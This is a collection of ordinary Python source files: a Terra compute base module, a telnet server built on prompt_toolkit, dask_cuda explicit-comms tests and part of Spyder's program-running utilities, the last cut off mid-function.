scorefile = self.pdb_name + score_tag
output_scorefile(p, self.input_class.pdb_path.get(), outputname, scorefile, self.score_class.score, self.output_class.decoys.get(), self.pose)
|
base.py
|
import ast
import os
import time
import atexit
from logging import StreamHandler
from logging.handlers import SocketHandler
import threading
import warnings
from terra import settings
import terra.compute.utils
from terra.executor import Executor
from terra.logger import (
getLogger, LogRecordSocketReceiver, SkipStdErrAddFilter
)
logger = getLogger(__name__)
class ServiceRunFailed(Exception):
''' Exception thrown when a service runner returns non-zero
'''
class BaseService:
'''
The base class for all Terra Service definitions
``super().__init__ should`` be called when inheriting a :class:`BaseService`
class's ``__init__``
Service definitions can define a ``pre_{command}`` and ``post_{command}``
function that will be called before and after a ``{command}Service`` call,
if they exist
'''
def __init__(self):
self.env = os.environ.copy()
self.volumes = []
''' A copy of the processes environment variables local to a service '''
def _env_array(self, key):
'''
Recover array environment variables
For example, define the following in ``terra.env``
.. code-block:: bash
SOMETHING=( "hello" "there" )
array_to_python_ast_list_of_strings SOMETHING_AST "${SOMETHING[@]}"
Services can recover the environment variable as a python compatible
array via
.. code-block:: python
self._env_array('SOMETHING_AST')
'''
return ast.literal_eval(self.env[key])
def _validate_volume(self, local, remote,
check_remote=True,
local_must_exist=False):
'''
Validate volume inputs. Raise a :class:`ValueError` under any of the
following conditions:
- ``local`` is empty or None
- ``check_remote`` is True and ``remote`` is empty or None
- ``local_must_exist`` is True and ``local`` file/folder does not exist
Raises
------
ValueError
see conditions above
'''
if not local:
raise ValueError('local file/folder must be specified')
elif check_remote and not remote:
raise ValueError('remote file/folder must be specified')
elif local_must_exist and not os.path.exists(local):
raise ValueError('local file/folder does not exist {}'
.format(local))
def add_volume(self, local, remote, flags=None, prefix=None,
local_must_exist=False):
'''
Add a volume to the service
'''
self._validate_volume(local, remote, local_must_exist=local_must_exist)
self.volumes.append((local, remote))
def pre_run(self):
'''
A function that runs before the run service
All service classes should implement at least ``run_service``, as this is
the quintessential call in running a service. ``pre_run`` in
:class:`terra.compute.base.BaseService` is mainly responsible for handling
Executors that need a separate volume translation
'''
# The executor volume map is calculated on the host side, where all the
# information is available. For example if using docker and celery, then
# docker config need to be run to get the container volumes, and that has
# to be run on the host machine. So this is calculated here.
settings.executor.volume_map = Executor.configuration_map(self)
logger.debug4("Executor Volume map: %s", settings.executor.volume_map)
def post_run(self):
pass
class AlreadyRegisteredException(Exception):
'''
Exception thrown if a function has already been registered
'''
class BaseCompute:
'''
The base class for all Terra Service Compute Arches
'''
@classmethod
def register(cls, service):
'''
Used to register a function for a particular service using a specific
compute
'''
service_name = f'{service.__module__}.{service.__qualname__}'
def wrapper(impl):
if service_name not in services:
services[service_name] = {}
if cls in services[service_name]:
raise AlreadyRegisteredException(f'Service {service_name} already '
'registered')
services[service_name][cls] = impl
return impl
return wrapper
def __getattr__(self, name):
implementation = name + '_service'
# Default implementation caller
try:
# super hasattr
self.__getattribute__(implementation)
except AttributeError:
raise AttributeError(f'Compute command "{name}" does not have a service '
f'implementation "{implementation}"') from None
def defaultCommand(self, service_class, *args, **kwargs):
service_info = terra.compute.utils.load_service(service_class)
# Check and call pre_ call
pre_call = getattr(service_info, 'pre_' + name, None)
if pre_call:
pre_call(*args, **kwargs)
# Call command implementation
rv = self.__getattribute__(implementation)(
service_info, *args, **kwargs)
# Check and call post_ call
post_call = getattr(service_info, 'post_' + name, None)
if post_call:
post_call(*args, **kwargs)
return rv
defaultCommand.__doc__ = f'''The {name} command for {__class__.__qualname__}
The {name} command will call the a service's pre_{name} if it has one,
followed by the {implementation}, and then the service's post_{name} if
it has one.
Calls {implementation}''' # noqa
defaultCommand.__name__ = name
defaultCommand.__qualname__ = type(self).__qualname__ + '.' + name
# bind function and return it
return defaultCommand.__get__(self, type(self))
def get_volume_map(self, config, service_info):
return []
def run_service(self, *args, **kwargs):
'''
Place holder for code to run an instance in the compute. Runs
``create`` and then runs and returns ``start`` by default.
'''
self.create(*args, **kwargs)
return self.start(*args, **kwargs)
def configuration_map_service(self, service_info):
'''
Returns the mapping of volumes from the host to the remote
Returns
-------
list
Return a list of tuple pairs [(host, remote), ... ] of the volumes
mounted from the host to remote
'''
return service_info.volumes
@staticmethod
def configure_logger(sender, **kwargs):
if settings.terra.zone == 'controller':
# Setup log file for use in configure
if settings.logging.log_file:
os.makedirs(os.path.dirname(settings.logging.log_file), exist_ok=True)
sender._log_file = settings.logging.log_file
else:
sender._log_file = os.devnull
os.makedirs(settings.processing_dir, exist_ok=True)
sender._log_file = open(sender._log_file, 'a')
sender.main_log_handler = StreamHandler(stream=sender._log_file)
sender.root_logger.addHandler(sender.main_log_handler)
# setup the TCP socket listener
sender.tcp_logging_server = LogRecordSocketReceiver(
settings.logging.server.listen_address,
settings.logging.server.port)
listener_thread = threading.Thread(
target=sender.tcp_logging_server.serve_until_stopped)
listener_thread.daemon = True
listener_thread.start()
# Wait up to a second, to make sure the thread started
for _ in range(1000):
if sender.tcp_logging_server.ready:
break
time.sleep(0.001)
else: # pragma: no cover
warnings.warn("TCP Logging server thread did not startup. "
"This is probably not a problem, unless logging isn't "
"working.", RuntimeWarning)
# Auto cleanup
@atexit.register
def cleanup_thread():
sender.tcp_logging_server.abort = 1
listener_thread.join(timeout=5)
if listener_thread.is_alive(): # pragma: no cover
warnings.warn("TCP Logger Server Thread did not shut down "
"gracefully. Attempting to exit anyways.",
RuntimeWarning)
elif settings.terra.zone == 'runner':
sender.main_log_handler = SocketHandler(
settings.logging.server.hostname, settings.logging.server.port)
# All runners have access to the master controller's stderr by virtue of
# running on the same host. By default, we go ahead and let them log
# there. Consequently, there is no need for the master controller to echo
# out the log messages a second time.
sender.main_log_handler.addFilter(SkipStdErrAddFilter())
sender.root_logger.addHandler(sender.main_log_handler)
@staticmethod
def reconfigure_logger(sender, **kwargs):
# sender is logger in this case
#
# The default logging handler is a StreamHandler. This will reconfigure its
# output stream
if settings.terra.zone == 'controller':
if settings.logging.log_file:
os.makedirs(os.path.dirname(settings.logging.log_file), exist_ok=True)
log_file = settings.logging.log_file
else:
log_file = os.devnull
# Check to see if _log_file is unset. If it is, this is due to _log_file
# being called without configure being called. While it is not important
# this work, it's more likely for unit testsing
# if not os.path.samefile(log_file, sender._log_file.name):
if getattr(sender, '_log_file', None) is not None and \
log_file != sender._log_file.name:
os.makedirs(settings.processing_dir, exist_ok=True)
sender._log_file.close()
sender._log_file = open(log_file, 'a')
elif settings.terra.zone == 'runner':
# Only if it's changed
if settings.logging.server.hostname != sender.main_log_handler.host or \
settings.logging.server.port != sender.main_log_handler.port:
# Reconnect Socket Handler
sender.main_log_handler.close()
try:
sender.root_logger.removeHandler(sender.main_log_handler)
except ValueError: # pragma: no cover
pass
sender.main_log_handler = SocketHandler(
settings.logging.server.hostname, settings.logging.server.port)
sender.root_logger.addHandler(sender.main_log_handler)
services = {}
|
server.py
|
"""
Telnet server.
Example usage::
class MyTelnetApplication(TelnetApplication):
def client_connected(self, telnet_connection):
# Set CLI with simple prompt.
telnet_connection.set_application(
telnet_connection.create_prompt_application(...))
def handle_command(self, telnet_connection, document):
# When the client enters a command, just reply.
telnet_connection.send('You said: %r\n\n' % document.text)
...
a = MyTelnetApplication()
TelnetServer(application=a, host='127.0.0.1', port=23).run()
"""
from __future__ import unicode_literals
import socket
import select
import threading
import os
import fcntl
from six import int2byte, text_type, binary_type
from codecs import getincrementaldecoder
from prompt_toolkit.enums import DEFAULT_BUFFER
from prompt_toolkit.eventloop.base import EventLoop
from prompt_toolkit.interface import CommandLineInterface, Application
from prompt_toolkit.layout.screen import Size
from prompt_toolkit.shortcuts import create_prompt_application
from prompt_toolkit.terminal.vt100_input import InputStream
from prompt_toolkit.terminal.vt100_output import Vt100_Output
from .log import logger
from .protocol import IAC, DO, LINEMODE, SB, MODE, SE, WILL, ECHO, NAWS, SUPPRESS_GO_AHEAD
from .protocol import TelnetProtocolParser
from .application import TelnetApplication
__all__ = (
'TelnetServer',
)
def _initialize_telnet(connection):
logger.info('Initializing telnet connection')
# Iac Do Linemode
connection.send(IAC + DO + LINEMODE)
# Suppress Go Ahead. (This seems important for Putty to do correct echoing.)
# This will allow bi-directional operation.
connection.send(IAC + WILL + SUPPRESS_GO_AHEAD)
# Iac sb
connection.send(IAC + SB + LINEMODE + MODE + int2byte(0) + IAC + SE)
# IAC Will Echo
connection.send(IAC + WILL + ECHO)
# Negotiate window size
connection.send(IAC + DO + NAWS)
class _ConnectionStdout(object):
"""
Wrapper around socket which provides `write` and `flush` methods for the
Vt100_Output output.
"""
def __init__(self, connection, encoding):
self._encoding = encoding
self._connection = connection
self._buffer = []
def write(self, data):
assert isinstance(data, text_type)
self._buffer.append(data.encode(self._encoding))
self.flush()
def flush(self):
try:
self._connection.send(b''.join(self._buffer))
except socket.error as e:
logger.error("Couldn't send data over socket: %s" % e)
self._buffer = []
class TelnetConnection(object):
"""
Class that represents one Telnet connection.
"""
def __init__(self, conn, addr, application, server, encoding):
assert isinstance(addr, tuple) # (addr, port) tuple
assert isinstance(application, TelnetApplication)
assert isinstance(server, TelnetServer)
assert isinstance(encoding, text_type) # e.g. 'utf-8'
self.conn = conn
self.addr = addr
self.application = application
self.closed = False
self.handling_command = True
self.server = server
self.encoding = encoding
self.callback = None # Function that handles the CLI result.
# Create "Output" object.
self.size = Size(rows=40, columns=79)
# Initialize.
_initialize_telnet(conn)
# Create output.
def get_size():
return self.size
self.stdout = _ConnectionStdout(conn, encoding=encoding)
self.vt100_output = Vt100_Output(self.stdout, get_size, write_binary=False)
# Create an eventloop (adaptor) for the CommandLineInterface.
self.eventloop = _TelnetEventLoopInterface(server)
# Set default CommandLineInterface.
self.set_application(create_prompt_application())
# Call client_connected
application.client_connected(self)
# Draw for the first time.
self.handling_command = False
self.cli._redraw()
def set_application(self, app, callback=None):
"""
Set ``CommandLineInterface`` instance for this connection.
(This can be replaced any time.)
:param cli: CommandLineInterface instance.
:param callback: Callable that takes the result of the CLI.
"""
assert isinstance(app, Application)
assert callback is None or callable(callback)
self.cli = CommandLineInterface(
application=app,
eventloop=self.eventloop,
output=self.vt100_output)
self.callback = callback
# Create a parser, and parser callbacks.
cb = self.cli.create_eventloop_callbacks()
inputstream = InputStream(cb.feed_key)
# Input decoder for stdin. (Required when working with multibyte
# characters, like chinese input.)
stdin_decoder_cls = getincrementaldecoder(self.encoding)
stdin_decoder = [stdin_decoder_cls()] # nonlocal
# Tell the CLI that it's running. We don't start it through the run()
# call, but will still want _redraw() to work.
self.cli._is_running = True
def data_received(data):
""" TelnetProtocolParser 'data_received' callback """
assert isinstance(data, binary_type)
try:
result = stdin_decoder[0].decode(data)
inputstream.feed(result)
except UnicodeDecodeError:
stdin_decoder[0] = stdin_decoder_cls()
return ''
def size_received(rows, columns):
""" TelnetProtocolParser 'size_received' callback """
self.size = Size(rows=rows, columns=columns)
cb.terminal_size_changed()
self.parser = TelnetProtocolParser(data_received, size_received)
def feed(self, data):
"""
Handler for incoming data. (Called by TelnetServer.)
"""
assert isinstance(data, binary_type)
self.parser.feed(data)
# Render again.
self.cli._redraw()
# When a return value has been set (enter was pressed), handle command.
if self.cli.is_returning:
try:
return_value = self.cli.return_value()
except (EOFError, KeyboardInterrupt) as e:
# Control-D or Control-C was pressed.
logger.info('%s, closing connection.', type(e).__name__)
self.close()
return
# Handle CLI command
self._handle_command(return_value)
def _handle_command(self, command):
"""
Handle command. This will run in a separate thread, in order not
to block the event loop.
"""
logger.info('Handle command %r', command)
def in_executor():
self.handling_command = True
try:
if self.callback is not None:
self.callback(self, command)
finally:
self.server.call_from_executor(done)
def done():
self.handling_command = False
# Reset state and draw again. (If the connection is still open --
# the application could have called TelnetConnection.close()
if not self.closed:
self.cli.reset()
self.cli.buffers[DEFAULT_BUFFER].reset()
self.cli.renderer.request_absolute_cursor_position()
self.vt100_output.flush()
self.cli._redraw()
self.server.run_in_executor(in_executor)
def erase_screen(self):
"""
Erase output screen.
"""
self.vt100_output.erase_screen()
self.vt100_output.cursor_goto(0, 0)
self.vt100_output.flush()
def send(self, data):
"""
Send text to the client.
"""
assert isinstance(data, text_type)
# When data is send back to the client, we should replace the line
# endings. (We didn't allocate a real pseudo terminal, and the telnet
# connection is raw, so we are responsible for inserting \r.)
self.stdout.write(data.replace('\n', '\r\n'))
self.stdout.flush()
def close(self):
"""
Close the connection.
"""
self.application.client_leaving(self)
self.conn.close()
self.closed = True
class _TelnetEventLoopInterface(EventLoop):
"""
Eventloop object to be assigned to `CommandLineInterface`.
"""
def __init__(self, server):
self._server = server
def close(self):
" Ignore. "
def stop(self):
" Ignore. "
def run_in_executor(self, callback):
self._server.run_in_executor(callback)
def call_from_executor(self, callback, _max_postpone_until=None):
self._server.call_from_executor(callback)
def add_reader(self, fd, callback):
raise NotImplementedError
def remove_reader(self, fd):
raise NotImplementedError
class TelnetServer(object):
"""
Telnet server implementation.
"""
def __init__(self, host='127.0.0.1', port=23, application=None, encoding='utf-8'):
assert isinstance(host, text_type)
assert isinstance(port, int)
assert isinstance(application, TelnetApplication)
assert isinstance(encoding, text_type)
self.host = host
self.port = port
self.application = application
self.encoding = encoding
self.connections = set()
self._calls_from_executor = []
# Create a pipe for inter thread communication.
self._schedule_pipe = os.pipe()
fcntl.fcntl(self._schedule_pipe[0], fcntl.F_SETFL, os.O_NONBLOCK)
@classmethod
def create_socket(cls, host, port):
# Create and bind socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((host, port))
s.listen(4)
return s
def run_in_executor(self, callback):
threading.Thread(target=callback).start()
def call_from_executor(self, callback):
self._calls_from_executor.append(callback)
if self._schedule_pipe:
os.write(self._schedule_pipe[1], b'x')
def _process_callbacks(self):
"""
Process callbacks from `call_from_executor` in eventloop.
"""
# Flush all the pipe content.
os.read(self._schedule_pipe[0], 1024)
# Process calls from executor.
calls_from_executor, self._calls_from_executor = self._calls_from_executor, []
for c in calls_from_executor:
c()
def run(self):
"""
Run the eventloop for the telnet server.
"""
listen_socket = self.create_socket(self.host, self.port)
logger.info('Listening for telnet connections on %s port %r', self.host, self.port)
try:
while True:
# Removed closed connections.
self.connections = set([c for c in self.connections if not c.closed])
# Ignore connections handling commands.
connections = set([c for c in self.connections if not c.handling_command])
# Wait for next event.
read_list = (
[listen_socket, self._schedule_pipe[0]] +
[c.conn for c in connections])
read, _, _ = select.select(read_list, [], [])
for s in read:
# When the socket itself is ready, accept a new connection.
if s == listen_socket:
self._accept(listen_socket)
# If we receive something on our "call_from_executor" pipe, process
# these callbacks in a thread safe way.
elif s == self._schedule_pipe[0]:
self._process_callbacks()
# Handle incoming data on socket.
else:
self._handle_incoming_data(s)
finally:
listen_socket.close()
def _accept(self, listen_socket):
"""
Accept new incoming connection.
"""
conn, addr = listen_socket.accept()
connection = TelnetConnection(conn, addr, self.application, self, encoding=self.encoding)
self.connections.add(connection)
logger.info('New connection %r %r', *addr)
def _handle_incoming_data(self, conn):
"""
Handle incoming data on socket.
"""
connection = [c for c in self.connections if c.conn == conn][0]
data = conn.recv(1024)
if data:
connection.feed(data)
else:
self.connections.remove(connection)
|
test_explicit_comms.py
|
import multiprocessing as mp
import numpy as np
import pandas as pd
import pytest
import dask
from dask import dataframe as dd
from dask.dataframe.shuffle import partitioning_index
from distributed import Client
from distributed.deploy.local import LocalCluster
import dask_cuda
from dask_cuda.explicit_comms import comms
from dask_cuda.explicit_comms.dataframe.merge import merge as explicit_comms_merge
from dask_cuda.explicit_comms.dataframe.shuffle import shuffle as explicit_comms_shuffle
mp = mp.get_context("spawn")
ucp = pytest.importorskip("ucp")
# Notice, all of the following tests is executed in a new process such
# that UCX options of the different tests doesn't conflict.
async def my_rank(state):
return state["rank"]
def _test_local_cluster(protocol):
with LocalCluster(
protocol=protocol,
dashboard_address=None,
n_workers=4,
threads_per_worker=1,
processes=True,
) as cluster:
with Client(cluster) as client:
c = comms.CommsContext(client)
assert sum(c.run(my_rank)) == sum(range(4))
@pytest.mark.parametrize("protocol", ["tcp", "ucx"])
def test_local_cluster(protocol):
p = mp.Process(target=_test_local_cluster, args=(protocol,))
p.start()
p.join()
assert not p.exitcode
def _test_dataframe_merge(backend, protocol, n_workers):
if backend == "cudf":
cudf = pytest.importorskip("cudf")
from cudf.tests.utils import assert_eq
else:
from dask.dataframe.utils import assert_eq
dask.config.update(
dask.config.global_config,
{"ucx": {"TLS": "tcp,sockcm,cuda_copy",},},
priority="new",
)
with LocalCluster(
protocol=protocol,
dashboard_address=None,
n_workers=n_workers,
threads_per_worker=1,
processes=True,
) as cluster:
with Client(cluster):
nrows = n_workers * 10
# Let's make some dataframes that we can join on the "key" column
df1 = pd.DataFrame({"key": np.arange(nrows), "payload1": np.arange(nrows)})
key = np.arange(nrows)
np.random.shuffle(key)
df2 = pd.DataFrame(
{"key": key[nrows // 3 :], "payload2": np.arange(nrows)[nrows // 3 :]}
)
expected = df1.merge(df2).set_index("key")
if backend == "cudf":
df1 = cudf.DataFrame.from_pandas(df1)
df2 = cudf.DataFrame.from_pandas(df2)
ddf1 = dd.from_pandas(df1, npartitions=n_workers + 1)
ddf2 = dd.from_pandas(
df2, npartitions=n_workers - 1 if n_workers > 1 else 1
)
ddf3 = explicit_comms_merge(ddf1, ddf2, on="key").set_index("key")
got = ddf3.compute()
if backend == "cudf":
assert_eq(got, expected)
else:
pd.testing.assert_frame_equal(got, expected)
@pytest.mark.parametrize("nworkers", [1, 2, 4])
@pytest.mark.parametrize("backend", ["pandas", "cudf"])
@pytest.mark.parametrize("protocol", ["tcp", "ucx"])
def test_dataframe_merge(backend, protocol, nworkers):
if backend == "cudf":
pytest.importorskip("cudf")
p = mp.Process(target=_test_dataframe_merge, args=(backend, protocol, nworkers))
p.start()
p.join()
assert not p.exitcode
def _test_dataframe_merge_empty_partitions(nrows, npartitions):
with LocalCluster(
protocol="tcp",
dashboard_address=None,
n_workers=npartitions,
threads_per_worker=1,
processes=True,
) as cluster:
with Client(cluster):
df1 = pd.DataFrame({"key": np.arange(nrows), "payload1": np.arange(nrows)})
key = np.arange(nrows)
np.random.shuffle(key)
df2 = pd.DataFrame({"key": key, "payload2": np.arange(nrows)})
expected = df1.merge(df2).set_index("key")
ddf1 = dd.from_pandas(df1, npartitions=npartitions)
ddf2 = dd.from_pandas(df2, npartitions=npartitions)
ddf3 = explicit_comms_merge(ddf1, ddf2, on=["key"]).set_index("key")
got = ddf3.compute()
pd.testing.assert_frame_equal(got, expected)
def test_dataframe_merge_empty_partitions():
# Notice, we use more partitions than rows
p = mp.Process(target=_test_dataframe_merge_empty_partitions, args=(2, 4))
p.start()
p.join()
assert not p.exitcode
def check_partitions(df, npartitions):
"""Check that all values in `df` hashes to the same"""
hashes = partitioning_index(df, npartitions)
if len(hashes) > 0:
return len(hashes.unique()) == 1
else:
return True
def _test_dataframe_shuffle(backend, protocol, n_workers):
if backend == "cudf":
cudf = pytest.importorskip("cudf")
from cudf.tests.utils import assert_eq
else:
from dask.dataframe.utils import assert_eq
dask.config.update(
dask.config.global_config,
{"ucx": {"TLS": "tcp,sockcm,cuda_copy",},},
priority="new",
)
with LocalCluster(
protocol=protocol,
dashboard_address=None,
n_workers=n_workers,
threads_per_worker=1,
processes=True,
) as cluster:
with Client(cluster) as client:
all_workers = list(client.get_worker_logs().keys())
comms.default_comms()
np.random.seed(42)
df = pd.DataFrame({"key": np.random.random(100)})
if backend == "cudf":
df = cudf.DataFrame.from_pandas(df)
for input_nparts in range(1, 5):
for output_nparts in range(1, 5):
ddf = dd.from_pandas(df.copy(), npartitions=input_nparts).persist(
workers=all_workers
)
ddf = explicit_comms_shuffle(
ddf, ["key"], npartitions=output_nparts
).persist()
assert ddf.npartitions == output_nparts
# Check that each partition of `ddf` hashes to the same value
result = ddf.map_partitions(
check_partitions, output_nparts
).compute()
assert all(result.to_list())
# Check the values of `ddf` (ignoring the row order)
expected = df.sort_values("key")
got = ddf.compute().sort_values("key")
if backend == "cudf":
assert_eq(got, expected)
else:
pd.testing.assert_frame_equal(got, expected)
@pytest.mark.parametrize("nworkers", [1, 2, 3])
@pytest.mark.parametrize("backend", ["pandas", "cudf"])
@pytest.mark.parametrize("protocol", ["tcp", "ucx"])
def test_dataframe_shuffle(backend, protocol, nworkers):
if backend == "cudf":
pytest.importorskip("cudf")
p = mp.Process(target=_test_dataframe_shuffle, args=(backend, protocol, nworkers))
p.start()
p.join()
assert not p.exitcode
def _test_dask_use_explicit_comms():
def check_shuffle(in_cluster):
"""Check if shuffle use explicit-comms by search for keys named "shuffle"
The explicit-comms implemention of shuffle doesn't produce any keys
named "shuffle"
"""
ddf = dd.from_pandas(pd.DataFrame({"key": np.arange(10)}), npartitions=2)
with dask.config.set(explicit_comms=False):
res = ddf.shuffle(on="key", npartitions=4, shuffle="tasks")
assert any(["shuffle" in str(key) for key in res.dask])
with dask.config.set(explicit_comms=True):
res = ddf.shuffle(on="key", npartitions=4, shuffle="tasks")
if in_cluster:
assert all(["shuffle" not in str(key) for key in res.dask])
else: # If not in cluster, we cannot use explicit comms
assert any(["shuffle" in str(key) for key in res.dask])
with LocalCluster(
protocol="tcp",
dashboard_address=None,
n_workers=2,
threads_per_worker=1,
processes=True,
) as cluster:
with Client(cluster):
check_shuffle(True)
check_shuffle(False)
def test_dask_use_explicit_comms():
p = mp.Process(target=_test_dask_use_explicit_comms)
p.start()
p.join()
assert not p.exitcode
def _test_jit_unspill(protocol):
import cudf
from cudf.tests.utils import assert_eq
dask.config.update(
dask.config.global_config,
{"ucx": {"TLS": "tcp,sockcm,cuda_copy",},},
priority="new",
)
with dask_cuda.LocalCUDACluster(
protocol=protocol,
dashboard_address=None,
n_workers=1,
threads_per_worker=1,
processes=True,
jit_unspill=True,
device_memory_limit="1B",
) as cluster:
with Client(cluster):
np.random.seed(42)
df = cudf.DataFrame.from_pandas(
pd.DataFrame({"key": np.random.random(100)})
)
ddf = dd.from_pandas(df.copy(), npartitions=4)
ddf = explicit_comms_shuffle(ddf, ["key"])
# Check the values of `ddf` (ignoring the row order)
expected = df.sort_values("key")
got = ddf.compute().sort_values("key")
assert_eq(got, expected)
@pytest.mark.parametrize("protocol", ["tcp", "ucx"])
def test_jit_unspill(protocol):
pytest.importorskip("cudf")
p = mp.Process(target=_test_jit_unspill, args=(protocol,))
p.start()
p.join()
assert not p.exitcode
|
programs.py
|
# -*- coding: utf-8 -*-
#
# Copyright © Spyder Project Contributors
# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
"""Running programs utilities."""
from __future__ import print_function
# Standard library imports
from ast import literal_eval
from distutils.version import LooseVersion
from getpass import getuser
from textwrap import dedent
import glob
import importlib
import itertools
import os
import os.path as osp
import re
import subprocess
import sys
import tempfile
import threading
import time
# Third party imports
import pkg_resources
import psutil
# Local imports
from spyder.config.base import (is_stable_version, running_under_pytest,
get_home_dir)
from spyder.config.utils import is_anaconda
from spyder.py3compat import PY2, is_text_string, to_text_string
from spyder.utils import encoding
from spyder.utils.misc import get_python_executable
HERE = osp.abspath(osp.dirname(__file__))
class ProgramError(Exception):
pass
def get_temp_dir(suffix=None):
"""
Return temporary Spyder directory, checking previously that it exists.
"""
to_join = [tempfile.gettempdir()]
if os.name == 'nt':
to_join.append('spyder')
else:
username = encoding.to_unicode_from_fs(getuser())
to_join.append('spyder-' + username)
if suffix is not None:
to_join.append(suffix)
tempdir = osp.join(*to_join)
if not osp.isdir(tempdir):
os.mkdir(tempdir)
return tempdir
def is_program_installed(basename):
"""
Return program absolute path if installed in PATH.
Otherwise, return None.
Also searches specific platform dependent paths that are not already in
PATH. This permits general use without assuming user profiles are
sourced (e.g. .bash_Profile), such as when login shells are not used to
launch Spyder.
On macOS systems, a .app is considered installed if it exists.
"""
home = get_home_dir()
req_paths = []
if sys.platform == 'darwin':
if basename.endswith('.app') and osp.exists(basename):
return basename
pyenv = [
osp.join('/usr', 'local', 'bin'),
osp.join(home, '.pyenv', 'bin')
]
# Prioritize Anaconda before Miniconda; local before global.
a = [osp.join(home, 'opt'), '/opt']
b = ['anaconda', 'miniconda', 'anaconda3', 'miniconda3']
conda = [osp.join(*p, 'condabin') for p in itertools.product(a, b)]
req_paths.extend(pyenv + conda)
elif sys.platform.startswith('linux'):
pyenv = [
osp.join('/usr', 'local', 'bin'),
osp.join(home, '.pyenv', 'bin')
]
a = [home, '/opt']
b = ['anaconda', 'miniconda', 'anaconda3', 'miniconda3']
conda = [osp.join(*p, 'condabin') for p in itertools.product(a, b)]
req_paths.extend(pyenv + conda)
elif os.name == 'nt':
pyenv = [osp.join(home, '.pyenv', 'pyenv-win', 'bin')]
a = [home, 'C:\\', osp.join('C:\\', 'ProgramData')]
b = ['Anaconda', 'Miniconda', 'Anaconda3', 'Miniconda3']
conda = [osp.join(*p, 'condabin') for p in itertools.product(a, b)]
req_paths.extend(pyenv + conda)
for path in os.environ['PATH'].split(os.pathsep) + req_paths:
abspath = osp.join(path, basename)
if osp.isfile(abspath):
return abspath
def find_program(basename):
"""
Find program in PATH and return absolute path
Try adding .exe or .bat to basename on Windows platforms
(return None if not found)
"""
names = [basename]
if os.name == 'nt':
# Windows platforms
extensions = ('.exe', '.bat', '.cmd')
if not basename.endswith(extensions):
names = [basename+ext for ext in extensions]+[basename]
for name in names:
path = is_program_installed(name)
if path:
return path
def get_full_command_for_program(path):
"""
Return the list of tokens necessary to open the program
at a given path.
On macOS systems, this function prefixes .app paths with
'open -a', which is necessary to run the application.
On all other OS's, this function has no effect.
:str path: The path of the program to run.
:return: The list of tokens necessary to run the program.
"""
if sys.platform == 'darwin' and path.endswith('.app'):
return ['open', '-a', path]
return [path]
def alter_subprocess_kwargs_by_platform(**kwargs):
"""
Given a dict, populate kwargs to create a generally
useful default setup for running subprocess processes
on different platforms. For example, `close_fds` is
set on posix and creation of a new console window is
disabled on Windows.
This function will alter the given kwargs and return
the modified dict.
"""
kwargs.setdefault('close_fds', os.name == 'posix')
if os.name == 'nt':
CONSOLE_CREATION_FLAGS = 0 # Default value
# See: https://msdn.microsoft.com/en-us/library/windows/desktop/ms684863%28v=vs.85%29.aspx
CREATE_NO_WINDOW = 0x08000000
# We "or" them together
CONSOLE_CREATION_FLAGS |= CREATE_NO_WINDOW
kwargs.setdefault('creationflags', CONSOLE_CREATION_FLAGS)
# ensure Windows subprocess environment has SYSTEMROOT
if kwargs.get('env') is not None:
# Is SYSTEMROOT, SYSTEMDRIVE in env? case insensitive
for env_var in ['SYSTEMROOT', 'SYSTEMDRIVE']:
if env_var not in map(str.upper, kwargs['env'].keys()):
# Add from os.environ
for k, v in os.environ.items():
if env_var == k.upper():
kwargs['env'].update({k: v})
break # don't risk multiple values
else:
# linux and macOS
if kwargs.get('env') is not None:
if 'HOME' not in kwargs['env']:
kwargs['env'].update({'HOME': get_home_dir()})
return kwargs
def run_shell_command(cmdstr, **subprocess_kwargs):
"""
Execute the given shell command.
Note that *args and **kwargs will be passed to the subprocess call.
If 'shell' is given in subprocess_kwargs it must be True,
otherwise ProgramError will be raised.
.
If 'executable' is not given in subprocess_kwargs, it will
be set to the value of the SHELL environment variable.
Note that stdin, stdout and stderr will be set by default
to PIPE unless specified in subprocess_kwargs.
:str cmdstr: The string run as a shell command.
:subprocess_kwargs: These will be passed to subprocess.Popen.
"""
if 'shell' in subprocess_kwargs and not subprocess_kwargs['shell']:
raise ProgramError(
'The "shell" kwarg may be omitted, but if '
'provided it must be True.')
else:
subprocess_kwargs['shell'] = True
# Don't pass SHELL to subprocess on Windows because it makes this
# fumction fail in Git Bash (where SHELL is declared; other Windows
# shells don't set it).
if not os.name == 'nt':
if 'executable' not in subprocess_kwargs:
subprocess_kwargs['executable'] = os.getenv('SHELL')
for stream in ['stdin', 'stdout', 'stderr']:
subprocess_kwargs.setdefault(stream, subprocess.PIPE)
subprocess_kwargs = alter_subprocess_kwargs_by_platform(
**subprocess_kwargs)
return subprocess.Popen(cmdstr, **subprocess_kwargs)
def run_program(program, args=None, **subprocess_kwargs):
"""
Run program in a separate process.
NOTE: returns the process object created by
`subprocess.Popen()`. This can be used with
`proc.communicate()` for example.
If 'shell' appears in the kwargs, it must be False,
otherwise ProgramError will be raised.
If only the program name is given and not the full path,
a lookup will be performed to find the program. If the
lookup fails, ProgramError will be raised.
Note that stdin, stdout and stderr will be set by default
to PIPE unless specified in subprocess_kwargs.
:str program: The name of the program to run.
:list args: The program arguments.
:subprocess_kwargs: These will be passed to subprocess.Popen.
"""
if 'shell' in subprocess_kwargs and subprocess_kwargs['shell']:
raise ProgramError(
"This function is only for non-shell programs, "
"use run_shell_command() instead.")
fullcmd = find_program(program)
if not fullcmd:
raise ProgramError("Program %s was not found" % program)
# As per subprocess, we make a complete list of prog+args
fullcmd = get_full_command_for_program(fullcmd) + (args or [])
for stream in ['stdin', 'stdout', 'stderr']:
subprocess_kwargs.setdefault(stream, subprocess.PIPE)
subprocess_kwargs = alter_subprocess_kwargs_by_platform(
**subprocess_kwargs)
return subprocess.Popen(fullcmd, **subprocess_kwargs)
def parse_linux_desktop_entry(fpath):
"""Load data from desktop entry with xdg specification."""
from xdg.DesktopEntry import DesktopEntry
try:
entry = DesktopEntry(fpath)
entry_data = {}
entry_data['name'] = entry.getName()
entry_data['icon_path'] = entry.getIcon()
entry_data['exec'] = entry.getExec()
entry_data['type'] = entry.getType()
entry_data['hidden'] = entry.getHidden()
entry_data['fpath'] = fpath
except Exception:
entry_data = {
'name': '',
'icon_path': '',
'hidden': '',
'exec': '',
'type': '',
'fpath': fpath
}
return entry_data
def _get_mac_application_icon_path(app_bundle_path):
"""Parse mac application bundle and return path for *.icns file."""
import plistlib
contents_path = info_path = os.path.join(app_bundle_path, 'Contents')
